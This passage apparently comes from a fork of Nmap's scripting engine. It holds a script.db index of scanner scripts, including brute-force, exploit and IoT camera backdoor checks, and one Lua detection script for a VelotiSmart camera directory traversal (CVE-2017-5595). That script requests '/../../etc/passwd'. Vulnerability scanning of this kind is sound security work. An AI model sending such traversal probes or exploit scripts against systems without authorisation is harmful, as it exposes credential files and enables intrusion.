"discovery", "safe", } } 327 | 
Entry { filename = "jdwp-inject.nse", categories = { "exploit", "intrusive", } } 328 | Entry { filename = "jdwp-version.nse", categories = { "version", } } 329 | Entry { filename = "knx-gateway-discover.nse", categories = { "broadcast", "discovery", "safe", } } 330 | Entry { filename = "knx-gateway-info.nse", categories = { "default", "discovery", "safe", } } 331 | Entry { filename = "krb5-enum-users.nse", categories = { "auth", "intrusive", } } 332 | Entry { filename = "ldap-brute.nse", categories = { "brute", "intrusive", } } 333 | Entry { filename = "ldap-novell-getpass.nse", categories = { "discovery", "safe", } } 334 | Entry { filename = "ldap-rootdse.nse", categories = { "discovery", "safe", } } 335 | Entry { filename = "ldap-search.nse", categories = { "discovery", "safe", } } 336 | Entry { filename = "lexmark-config.nse", categories = { "discovery", "safe", } } 337 | Entry { filename = "llmnr-resolve.nse", categories = { "broadcast", "discovery", "safe", } } 338 | Entry { filename = "lltd-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 339 | Entry { filename = "lu-enum.nse", categories = { "brute", "intrusive", } } 340 | Entry { filename = "maxdb-info.nse", categories = { "default", "safe", "version", } } 341 | Entry { filename = "mcafee-epo-agent.nse", categories = { "safe", "version", } } 342 | Entry { filename = "membase-brute.nse", categories = { "brute", "intrusive", } } 343 | Entry { filename = "membase-http-info.nse", categories = { "discovery", "safe", } } 344 | Entry { filename = "memcached-info.nse", categories = { "discovery", "safe", } } 345 | Entry { filename = "metasploit-info.nse", categories = { "intrusive", "safe", } } 346 | Entry { filename = "metasploit-msgrpc-brute.nse", categories = { "brute", "intrusive", } } 347 | Entry { filename = "metasploit-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } 348 | Entry { filename = "mikrotik-routeros-brute.nse", categories = { "brute", "intrusive", } } 349 | Entry { 
filename = "mmouse-brute.nse", categories = { "brute", "intrusive", } } 350 | Entry { filename = "mmouse-exec.nse", categories = { "intrusive", } } 351 | Entry { filename = "modbus-discover.nse", categories = { "discovery", "intrusive", } } 352 | Entry { filename = "mongodb-brute.nse", categories = { "brute", "intrusive", } } 353 | Entry { filename = "mongodb-databases.nse", categories = { "default", "discovery", "safe", } } 354 | Entry { filename = "mongodb-info.nse", categories = { "default", "discovery", "safe", } } 355 | Entry { filename = "mqtt-subscribe.nse", categories = { "discovery", "safe", "version", } } 356 | Entry { filename = "mrinfo.nse", categories = { "broadcast", "discovery", "safe", } } 357 | Entry { filename = "ms-sql-brute.nse", categories = { "brute", "intrusive", } } 358 | Entry { filename = "ms-sql-config.nse", categories = { "discovery", "safe", } } 359 | Entry { filename = "ms-sql-dac.nse", categories = { "discovery", "safe", } } 360 | Entry { filename = "ms-sql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } 361 | Entry { filename = "ms-sql-empty-password.nse", categories = { "auth", "intrusive", } } 362 | Entry { filename = "ms-sql-hasdbaccess.nse", categories = { "auth", "discovery", "safe", } } 363 | Entry { filename = "ms-sql-info.nse", categories = { "default", "discovery", "safe", } } 364 | Entry { filename = "ms-sql-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 365 | Entry { filename = "ms-sql-query.nse", categories = { "discovery", "safe", } } 366 | Entry { filename = "ms-sql-tables.nse", categories = { "discovery", "safe", } } 367 | Entry { filename = "ms-sql-xp-cmdshell.nse", categories = { "intrusive", } } 368 | Entry { filename = "msrpc-enum.nse", categories = { "discovery", "safe", } } 369 | Entry { filename = "mtrace.nse", categories = { "broadcast", "discovery", "safe", } } 370 | Entry { filename = "murmur-version.nse", categories = { "version", } } 371 | Entry { filename = 
"mysql-audit.nse", categories = { "discovery", "safe", } } 372 | Entry { filename = "mysql-brute.nse", categories = { "brute", "intrusive", } } 373 | Entry { filename = "mysql-databases.nse", categories = { "discovery", "intrusive", } } 374 | Entry { filename = "mysql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } } 375 | Entry { filename = "mysql-empty-password.nse", categories = { "auth", "intrusive", } } 376 | Entry { filename = "mysql-enum.nse", categories = { "brute", "intrusive", } } 377 | Entry { filename = "mysql-info.nse", categories = { "default", "discovery", "safe", } } 378 | Entry { filename = "mysql-query.nse", categories = { "auth", "discovery", "safe", } } 379 | Entry { filename = "mysql-users.nse", categories = { "auth", "intrusive", } } 380 | Entry { filename = "mysql-variables.nse", categories = { "discovery", "intrusive", } } 381 | Entry { filename = "mysql-vuln-cve2012-2122.nse", categories = { "discovery", "intrusive", "vuln", } } 382 | Entry { filename = "nat-pmp-info.nse", categories = { "default", "discovery", "safe", } } 383 | Entry { filename = "nat-pmp-mapport.nse", categories = { "discovery", "safe", } } 384 | Entry { filename = "nbd-info.nse", categories = { "discovery", "intrusive", } } 385 | Entry { filename = "nbns-interfaces.nse", categories = { "default", "discovery", "safe", } } 386 | Entry { filename = "nbstat.nse", categories = { "default", "discovery", "safe", } } 387 | Entry { filename = "ncp-enum-users.nse", categories = { "auth", "safe", } } 388 | Entry { filename = "ncp-serverinfo.nse", categories = { "default", "discovery", "safe", } } 389 | Entry { filename = "ndmp-fs-info.nse", categories = { "discovery", "safe", } } 390 | Entry { filename = "ndmp-version.nse", categories = { "version", } } 391 | Entry { filename = "nessus-brute.nse", categories = { "brute", "intrusive", } } 392 | Entry { filename = "nessus-xmlrpc-brute.nse", categories = { "brute", "intrusive", } } 393 | Entry { filename = 
"netbus-auth-bypass.nse", categories = { "auth", "safe", "vuln", } } 394 | Entry { filename = "netbus-brute.nse", categories = { "brute", "intrusive", } } 395 | Entry { filename = "netbus-info.nse", categories = { "default", "discovery", "safe", } } 396 | Entry { filename = "netbus-version.nse", categories = { "version", } } 397 | Entry { filename = "nexpose-brute.nse", categories = { "brute", "intrusive", } } 398 | Entry { filename = "nfs-ls.nse", categories = { "discovery", "safe", } } 399 | Entry { filename = "nfs-showmount.nse", categories = { "discovery", "safe", } } 400 | Entry { filename = "nfs-statfs.nse", categories = { "discovery", "safe", } } 401 | Entry { filename = "nje-node-brute.nse", categories = { "brute", "intrusive", } } 402 | Entry { filename = "nje-pass-brute.nse", categories = { "brute", "intrusive", } } 403 | Entry { filename = "nntp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 404 | Entry { filename = "nping-brute.nse", categories = { "brute", "intrusive", } } 405 | Entry { filename = "nrpe-enum.nse", categories = { "discovery", "intrusive", } } 406 | Entry { filename = "ntp-info.nse", categories = { "default", "discovery", "safe", } } 407 | Entry { filename = "ntp-monlist.nse", categories = { "discovery", "intrusive", } } 408 | Entry { filename = "omp2-brute.nse", categories = { "brute", "intrusive", } } 409 | Entry { filename = "omp2-enum-targets.nse", categories = { "discovery", "safe", } } 410 | Entry { filename = "omron-info.nse", categories = { "discovery", "version", } } 411 | Entry { filename = "openflow-info.nse", categories = { "default", "safe", } } 412 | Entry { filename = "openlookup-info.nse", categories = { "default", "discovery", "safe", "version", } } 413 | Entry { filename = "openvas-otp-brute.nse", categories = { "brute", "intrusive", } } 414 | Entry { filename = "openwebnet-discovery.nse", categories = { "discovery", "safe", } } 415 | Entry { filename = "oracle-brute-stealth.nse", categories = { 
"brute", "intrusive", } } 416 | Entry { filename = "oracle-brute.nse", categories = { "brute", "intrusive", } } 417 | Entry { filename = "oracle-enum-users.nse", categories = { "auth", "intrusive", } } 418 | Entry { filename = "oracle-sid-brute.nse", categories = { "brute", "intrusive", } } 419 | Entry { filename = "oracle-tns-version.nse", categories = { "safe", "version", } } 420 | Entry { filename = "ovs-agent-version.nse", categories = { "version", } } 421 | Entry { filename = "p2p-conficker.nse", categories = { "default", "safe", } } 422 | Entry { filename = "path-mtu.nse", categories = { "discovery", "safe", } } 423 | Entry { filename = "pcanywhere-brute.nse", categories = { "brute", "intrusive", } } 424 | Entry { filename = "pcworx-info.nse", categories = { "discovery", } } 425 | Entry { filename = "pgsql-brute.nse", categories = { "brute", "intrusive", } } 426 | Entry { filename = "pjl-ready-message.nse", categories = { "intrusive", } } 427 | Entry { filename = "pop3-brute.nse", categories = { "brute", "intrusive", } } 428 | Entry { filename = "pop3-capabilities.nse", categories = { "default", "discovery", "safe", } } 429 | Entry { filename = "pop3-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 430 | Entry { filename = "port-states.nse", categories = { "safe", } } 431 | Entry { filename = "pptp-version.nse", categories = { "version", } } 432 | Entry { filename = "puppet-naivesigning.nse", categories = { "intrusive", "vuln", } } 433 | Entry { filename = "qconn-exec.nse", categories = { "exploit", "intrusive", "vuln", } } 434 | Entry { filename = "qscan.nse", categories = { "discovery", "safe", } } 435 | Entry { filename = "quake1-info.nse", categories = { "default", "discovery", "safe", "version", } } 436 | Entry { filename = "quake3-info.nse", categories = { "default", "discovery", "safe", "version", } } 437 | Entry { filename = "quake3-master-getservers.nse", categories = { "default", "discovery", "safe", } } 438 | Entry { filename = 
"rdp-enum-encryption.nse", categories = { "discovery", "safe", } } 439 | Entry { filename = "rdp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 440 | Entry { filename = "rdp-vuln-ms12-020.nse", categories = { "intrusive", "vuln", } } 441 | Entry { filename = "realvnc-auth-bypass.nse", categories = { "auth", "safe", "vuln", } } 442 | Entry { filename = "redis-brute.nse", categories = { "brute", "intrusive", } } 443 | Entry { filename = "redis-info.nse", categories = { "discovery", "safe", } } 444 | Entry { filename = "resolveall.nse", categories = { "discovery", "safe", } } 445 | Entry { filename = "reverse-index.nse", categories = { "safe", } } 446 | Entry { filename = "rexec-brute.nse", categories = { "brute", "intrusive", } } 447 | Entry { filename = "rfc868-time.nse", categories = { "discovery", "safe", "version", } } 448 | Entry { filename = "riak-http-info.nse", categories = { "discovery", "safe", } } 449 | Entry { filename = "rlogin-brute.nse", categories = { "brute", "intrusive", } } 450 | Entry { filename = "rmi-dumpregistry.nse", categories = { "default", "discovery", "safe", } } 451 | Entry { filename = "rmi-vuln-classloader.nse", categories = { "intrusive", "vuln", } } 452 | Entry { filename = "rpc-grind.nse", categories = { "version", } } 453 | Entry { filename = "rpcap-brute.nse", categories = { "brute", "intrusive", } } 454 | Entry { filename = "rpcap-info.nse", categories = { "discovery", "safe", } } 455 | Entry { filename = "rpcinfo.nse", categories = { "default", "discovery", "safe", "version", } } 456 | Entry { filename = "rsa-vuln-roca.nse", categories = { "safe", "vuln", } } 457 | Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } } 458 | Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } } 459 | Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } } 460 | Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } } 461 | 
Entry { filename = "rusers.nse", categories = { "discovery", "safe", } } 462 | Entry { filename = "s7-info.nse", categories = { "discovery", "version", } } 463 | Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } } 464 | Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } } 465 | Entry { filename = "shodan-api.nse", categories = { "discovery", "external", "safe", } } 466 | Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } } 467 | Entry { filename = "sip-call-spoof.nse", categories = { "discovery", "intrusive", } } 468 | Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } } 469 | Entry { filename = "sip-methods.nse", categories = { "default", "discovery", "safe", } } 470 | Entry { filename = "skypev2-version.nse", categories = { "version", } } 471 | Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } } 472 | Entry { filename = "smb-double-pulsar-backdoor.nse", categories = { "malware", "safe", "vuln", } } 473 | Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } } 474 | Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } } 475 | Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } } 476 | Entry { filename = "smb-enum-services.nse", categories = { "discovery", "intrusive", "safe", } } 477 | Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } } 478 | Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } } 479 | Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } } 480 | Entry { filename = "smb-flood.nse", categories = { "dos", "intrusive", } } 481 | Entry { filename = "smb-ls.nse", categories = { "discovery", "safe", } } 482 | Entry { filename = "smb-mbenum.nse", categories = { "discovery", "safe", } } 483 | Entry { filename = 
"smb-os-discovery.nse", categories = { "default", "discovery", "safe", } } 484 | Entry { filename = "smb-print-text.nse", categories = { "intrusive", } } 485 | Entry { filename = "smb-protocols.nse", categories = { "discovery", "safe", } } 486 | Entry { filename = "smb-psexec.nse", categories = { "intrusive", } } 487 | Entry { filename = "smb-security-mode.nse", categories = { "default", "discovery", "safe", } } 488 | Entry { filename = "smb-server-stats.nse", categories = { "discovery", "intrusive", } } 489 | Entry { filename = "smb-system-info.nse", categories = { "discovery", "intrusive", } } 490 | Entry { filename = "smb-vuln-conficker.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 491 | Entry { filename = "smb-vuln-cve-2017-7494.nse", categories = { "intrusive", "vuln", } } 492 | Entry { filename = "smb-vuln-cve2009-3103.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 493 | Entry { filename = "smb-vuln-ms06-025.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 494 | Entry { filename = "smb-vuln-ms07-029.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 495 | Entry { filename = "smb-vuln-ms08-067.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 496 | Entry { filename = "smb-vuln-ms10-054.nse", categories = { "dos", "intrusive", "vuln", } } 497 | Entry { filename = "smb-vuln-ms10-061.nse", categories = { "intrusive", "vuln", } } 498 | Entry { filename = "smb-vuln-ms17-010.nse", categories = { "safe", "vuln", } } 499 | Entry { filename = "smb-vuln-regsvc-dos.nse", categories = { "dos", "exploit", "intrusive", "vuln", } } 500 | Entry { filename = "smb-vuln-webexec.nse", categories = { "intrusive", "vuln", } } 501 | Entry { filename = "smb-webexec-exploit.nse", categories = { "exploit", "intrusive", } } 502 | Entry { filename = "smb2-capabilities.nse", categories = { "discovery", "safe", } } 503 | Entry { filename = "smb2-security-mode.nse", categories = { "default", "discovery", "safe", } 
} 504 | Entry { filename = "smb2-time.nse", categories = { "default", "discovery", "safe", } } 505 | Entry { filename = "smb2-vuln-uptime.nse", categories = { "safe", "vuln", } } 506 | Entry { filename = "smtp-brute.nse", categories = { "brute", "intrusive", } } 507 | Entry { filename = "smtp-commands.nse", categories = { "default", "discovery", "safe", } } 508 | Entry { filename = "smtp-enum-users.nse", categories = { "auth", "external", "intrusive", } } 509 | Entry { filename = "smtp-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 510 | Entry { filename = "smtp-open-relay.nse", categories = { "discovery", "external", "intrusive", } } 511 | Entry { filename = "smtp-strangeport.nse", categories = { "malware", "safe", } } 512 | Entry { filename = "smtp-vuln-cve2010-4344.nse", categories = { "exploit", "intrusive", "vuln", } } 513 | Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vuln", } } 514 | Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } } 515 | Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } } 516 | Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } } 517 | Entry { filename = "snmp-hh3c-logins.nse", categories = { "default", "discovery", "safe", } } 518 | Entry { filename = "snmp-info.nse", categories = { "default", "safe", "version", } } 519 | Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } } 520 | Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } } 521 | Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } } 522 | Entry { filename = "snmp-processes.nse", categories = { "default", "discovery", "safe", } } 523 | Entry { filename = "snmp-sysdescr.nse", categories = { "default", "discovery", "safe", } } 524 | Entry { filename = "snmp-win32-services.nse", categories = { "default", "discovery", "safe", } } 525 | Entry { 
filename = "snmp-win32-shares.nse", categories = { "default", "discovery", "safe", } } 526 | Entry { filename = "snmp-win32-software.nse", categories = { "default", "discovery", "safe", } } 527 | Entry { filename = "snmp-win32-users.nse", categories = { "auth", "default", "safe", } } 528 | Entry { filename = "socks-auth-info.nse", categories = { "default", "discovery", "safe", } } 529 | Entry { filename = "socks-brute.nse", categories = { "brute", "intrusive", } } 530 | Entry { filename = "socks-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } } 531 | Entry { filename = "ssh-auth-methods.nse", categories = { "auth", "intrusive", } } 532 | Entry { filename = "ssh-brute.nse", categories = { "brute", "intrusive", } } 533 | Entry { filename = "ssh-hostkey.nse", categories = { "default", "discovery", "safe", } } 534 | Entry { filename = "ssh-publickey-acceptance.nse", categories = { "auth", "intrusive", } } 535 | Entry { filename = "ssh-run.nse", categories = { "intrusive", } } 536 | Entry { filename = "ssh2-enum-algos.nse", categories = { "discovery", "safe", } } 537 | Entry { filename = "sshv1.nse", categories = { "default", "safe", } } 538 | Entry { filename = "ssl-ccs-injection.nse", categories = { "safe", "vuln", } } 539 | Entry { filename = "ssl-cert-intaddr.nse", categories = { "discovery", "safe", "vuln", } } 540 | Entry { filename = "ssl-cert.nse", categories = { "default", "discovery", "safe", } } 541 | Entry { filename = "ssl-date.nse", categories = { "default", "discovery", "safe", } } 542 | Entry { filename = "ssl-dh-params.nse", categories = { "safe", "vuln", } } 543 | Entry { filename = "ssl-enum-ciphers.nse", categories = { "discovery", "intrusive", } } 544 | Entry { filename = "ssl-heartbleed.nse", categories = { "safe", "vuln", } } 545 | Entry { filename = "ssl-known-key.nse", categories = { "default", "discovery", "safe", "vuln", } } 546 | Entry { filename = "ssl-poodle.nse", categories = { "safe", "vuln", } } 547 | Entry 
{ filename = "sslv2-drown.nse", categories = { "intrusive", "vuln", } } 548 | Entry { filename = "sslv2.nse", categories = { "default", "safe", } } 549 | Entry { filename = "sstp-discover.nse", categories = { "default", "discovery", "safe", } } 550 | Entry { filename = "stun-info.nse", categories = { "discovery", "safe", } } 551 | Entry { filename = "stun-version.nse", categories = { "version", } } 552 | Entry { filename = "stuxnet-detect.nse", categories = { "discovery", "intrusive", } } 553 | Entry { filename = "supermicro-ipmi-conf.nse", categories = { "exploit", "vuln", } } 554 | Entry { filename = "svn-brute.nse", categories = { "brute", "intrusive", } } 555 | Entry { filename = "targets-asn.nse", categories = { "discovery", "external", "safe", } } 556 | Entry { filename = "targets-ipv6-map4to6.nse", categories = { "discovery", } } 557 | Entry { filename = "targets-ipv6-multicast-echo.nse", categories = { "broadcast", "discovery", } } 558 | Entry { filename = "targets-ipv6-multicast-invalid-dst.nse", categories = { "broadcast", "discovery", } } 559 | Entry { filename = "targets-ipv6-multicast-mld.nse", categories = { "broadcast", "discovery", } } 560 | Entry { filename = "targets-ipv6-multicast-slaac.nse", categories = { "broadcast", "discovery", } } 561 | Entry { filename = "targets-ipv6-wordlist.nse", categories = { "discovery", } } 562 | Entry { filename = "targets-sniffer.nse", categories = { "broadcast", "discovery", "safe", } } 563 | Entry { filename = "targets-traceroute.nse", categories = { "discovery", "safe", } } 564 | Entry { filename = "targets-xml.nse", categories = { "safe", } } 565 | Entry { filename = "teamspeak2-version.nse", categories = { "version", } } 566 | Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } } 567 | Entry { filename = "telnet-encryption.nse", categories = { "discovery", "safe", } } 568 | Entry { filename = "telnet-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 569 | Entry { 
filename = "tftp-enum.nse", categories = { "discovery", "intrusive", } } 570 | Entry { filename = "tls-alpn.nse", categories = { "default", "discovery", "safe", } } 571 | Entry { filename = "tls-nextprotoneg.nse", categories = { "default", "discovery", "safe", } } 572 | Entry { filename = "tls-ticketbleed.nse", categories = { "safe", "vuln", } } 573 | Entry { filename = "tn3270-screen.nse", categories = { "discovery", "safe", } } 574 | Entry { filename = "tor-consensus-checker.nse", categories = { "external", "safe", } } 575 | Entry { filename = "traceroute-geolocation.nse", categories = { "discovery", "external", "safe", } } 576 | Entry { filename = "tso-brute.nse", categories = { "intrusive", } } 577 | Entry { filename = "tso-enum.nse", categories = { "brute", "intrusive", } } 578 | Entry { filename = "ubiquiti-discovery.nse", categories = { "default", "discovery", "safe", "version", } } 579 | Entry { filename = "unittest.nse", categories = { "safe", } } 580 | Entry { filename = "unusual-port.nse", categories = { "safe", } } 581 | Entry { filename = "upnp-info.nse", categories = { "default", "discovery", "safe", } } 582 | Entry { filename = "uptime-agent-info.nse", categories = { "default", "safe", } } 583 | Entry { filename = "url-snarf.nse", categories = { "safe", } } 584 | Entry { filename = "ventrilo-info.nse", categories = { "default", "discovery", "safe", "version", } } 585 | Entry { filename = "versant-info.nse", categories = { "discovery", "safe", } } 586 | Entry { filename = "vmauthd-brute.nse", categories = { "brute", "intrusive", } } 587 | Entry { filename = "vmware-version.nse", categories = { "discovery", "safe", "version", } } 588 | Entry { filename = "vnc-brute.nse", categories = { "brute", "intrusive", } } 589 | Entry { filename = "vnc-info.nse", categories = { "default", "discovery", "safe", } } 590 | Entry { filename = "vnc-title.nse", categories = { "discovery", "intrusive", } } 591 | Entry { filename = "voldemort-info.nse", categories = { 
"discovery", "safe", } } 592 | Entry { filename = "vtam-enum.nse", categories = { "brute", "intrusive", } } 593 | Entry { filename = "vulners.nse", categories = { "external", "safe", "vuln", } } 594 | Entry { filename = "vuze-dht-info.nse", categories = { "discovery", "safe", } } 595 | Entry { filename = "wdb-version.nse", categories = { "default", "discovery", "safe", "version", "vuln", } } 596 | Entry { filename = "weblogic-t3-info.nse", categories = { "default", "discovery", "safe", "version", } } 597 | Entry { filename = "whois-domain.nse", categories = { "discovery", "external", "safe", } } 598 | Entry { filename = "whois-ip.nse", categories = { "discovery", "external", "safe", } } 599 | Entry { filename = "wsdd-discover.nse", categories = { "default", "discovery", "safe", } } 600 | Entry { filename = "x11-access.nse", categories = { "auth", "default", "safe", } } 601 | Entry { filename = "xdmcp-discover.nse", categories = { "discovery", "safe", } } 602 | Entry { filename = "xmlrpc-methods.nse", categories = { "default", "discovery", "safe", } } 603 | Entry { filename = "xmpp-brute.nse", categories = { "brute", "intrusive", } } 604 | Entry { filename = "xmpp-info.nse", categories = { "default", "discovery", "safe", "version", } } 605 | Entry { filename = "cam_directorytraveral_03.nse", categories = { "CAM", "cam_directorytraveral_03", "vuln_detect"} } 606 | Entry { filename = "cnvd-2021-14544.nse", categories = { "hikvision", "cnvd-2021-14544", "vuln_detect" } } 607 | Entry { filename = "hikvision_7088_post.nse", categories = { "hikvision", "hikvision_7088_post", "vuln_detect"} } 608 | Entry { filename = "hikvision_backdoor_05.nse", categories = { "hikvision", "hikvision_backdoor_05", "vuln_detect"} } 609 | Entry { filename = "hikvision_information_leakage.nse", categories = { "hikvision", "hikvision_information_leakage", "vuln_detect"} } 610 | Entry { filename = "hikvision_lfi_06.nse", categories = { "hikvision", "hikvision_lfi_06", "vuln_detect"} } 611 | 
Entry { filename = "dahua_backdoor.nse", categories = { "dahua", "dahua_backdoor", "vuln_detect"} } 612 | Entry { filename = "dahua_unauth_02.nse", categories = { "dahua", "dahua_unauth_02", "vuln_detect"} } 613 | Entry { filename = "goahead_rce_01.nse", categories = { "goahead", "goahead_rce_01", "vuln_detect"} } 614 | Entry { filename = "lg_infoleak_v1.nse", categories = { "LG", "lg_infoleak_v1", "vuln_detect"} } 615 | Entry { filename = "lg_lfi.nse", categories = { "LG", "lg_lfi", "vuln_detect"} } 616 | Entry { filename = "credentials_disclosure.nse", categories = { "Novo", "credentials_disclosure", "vuln_detect" } } 617 | Entry { filename = "nuuo_backdoor_06.nse", categories = { "Nuuo", "nuuo_backdoor_06", "vuln_detect"} } 618 | Entry { filename = "RG_UAC_information_leakage.nse", categories = { "ruijie", "RG_UAC_information_leakage", "vuln_detect" } } 619 | Entry { filename = "uniview_dvr_nvr_rce_03.nse", categories = { "uniview", "uniview_dvr_nvr_rce_03", "vuln_detect" } } 620 | Entry { filename = "uniview_infoleak_01.nse", categories = { "uniview", "uniview_infoleak_01", "vuln_detect" } } 621 | Entry { filename = "uniview_rce_02.nse", categories = { "uniview", "uniview_rce_02", "vuln_detect" } } 622 | Entry { filename = "xiong-mai-60001.nse", categories = { "xiongmai", "xiongmai_60001", "vuln_detect" } } 623 | Entry { filename = "gb28181_nodetect.nse", categories = { "GB28181", "GB28181_nodetect", "vuln_detect" } } 624 | Entry { filename = "velotismart_directory_traversal.nse", categories = { "velotismart_directory_traversal", "vuln_detect" } } 625 | Entry { filename = "onvif_post_timecomparion.nse", categories = { "onvif_post_timecomparion", "vuln_detect" } } 626 | Entry { filename = "onvif_anonymouse_access_detect.nse", categories = { "onvif_anonymouse_access_detect", "vuln_detect" } } 627 | -------------------------------------------------------------------------------- /velotismart/velotismart_directory_traversal.nse: 
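--------------------------------------------------------------------------------
--- Detection check for the directory traversal tracked as CVE-2017-5595
-- (VelotiSmart WiFi camera).
--
-- Per the description below, an unauthenticated user can read sensitive
-- system files such as /etc/passwd through path traversal. The script sends
-- one GET request for a traversal path and reports whether the response
-- body looks like a passwd file.
--
-- @output
-- "Found Vulnerable" when a 200 response contains a root passwd record,
-- "Not Vulnerable" in every other case.

local http = require "http"
local string = require "string"
local stdnse = require "stdnse"
local shortport = require "shortport"


author = "seaung"


license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- NOTE(review): both category names are project-specific, so the script is
-- not picked up by the stock selectors (e.g. "vuln", "safe"). Confirm whether
-- a standard category should be listed as well; the names are left unchanged
-- here so they stay consistent with the script.db entry.
categories = {"vuln_detect", "velotismart_directory_traversal"}


description = [[
CVE:CVE-2017-5595
Desc: VelotiSmart WiFi camera存在目录遍历漏洞,未授权用户可以通过目录
遍历来查看系统敏感信息,如/etc/passwd
]]

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

-- Path requested from the target web server.
local PROBE_PATH = "/../../etc/passwd"

-- Lua pattern for a passwd record of the form "root:<password field>:0:0:" at
-- the start of a line. The original check accepted any body containing the
-- substring "root", which also matches unrelated pages (for example a device
-- that answers every URL with a 200 error page mentioning "root").
local ROOT_ENTRY = "\nroot:[^:\n]*:0:0:"

--- Probe one HTTP(S) port and classify the response.
-- @param host Host table supplied by NSE.
-- @param port Port table supplied by NSE.
-- @return "Found Vulnerable" or "Not Vulnerable".
action = function(host, port)
  local r = http.get(host, port, PROBE_PATH)

  -- A failed request can leave status or body unset; treat that as a
  -- negative result instead of letting string.find raise on a nil body.
  if not r or r.status ~= 200 or type(r.body) ~= "string" then
    stdnse.debug1("no usable response for %s (status: %s)",
      PROBE_PATH, tostring(r and r.status))
    return "Not Vulnerable"
  end

  -- Prefix a newline so the line-start anchor in ROOT_ENTRY also matches a
  -- record on the very first line of the body.
  if string.find("\n" .. r.body, ROOT_ENTRY) then
    return "Found Vulnerable"
  end

  return "Not Vulnerable"
end
--------------------------------------------------------------------------------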